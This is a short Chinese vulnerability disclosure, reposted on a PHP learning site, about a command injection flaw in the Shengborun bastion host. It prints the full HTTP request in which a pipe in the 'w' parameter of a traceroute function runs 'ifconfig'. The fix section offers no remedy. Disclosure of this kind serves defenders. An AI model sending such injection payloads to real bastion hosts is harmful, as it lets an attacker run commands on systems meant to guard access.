网站地图    收藏   

主页 > 后端 > 网站安全 >

圣博润堡垒主机命令注入漏洞 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 其实这个漏洞比较鸡肋,必须有堡垒主机最高权限帐号登陆后才行,而这个权限帐号只有一个且新建用户不能继承该权限,相对来说危害小了很多。POST aim synRequest do HTTP 1 1method=trace_ro...

其实这个漏洞比较鸡肋,必须有堡垒主机最高权限帐号登陆后才行,而这个权限帐号只有一个且新建用户不能继承该权限,相对来说危害小了很多。
 
POST /aim/synRequest.do HTTP/1.1
 
 
 
method=trace_route&ip=192.168.1.1&m=5&w=2|ifconfig
 
 
修复方案:
不嘚吧了,开发老鸟都知道怎么回事。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论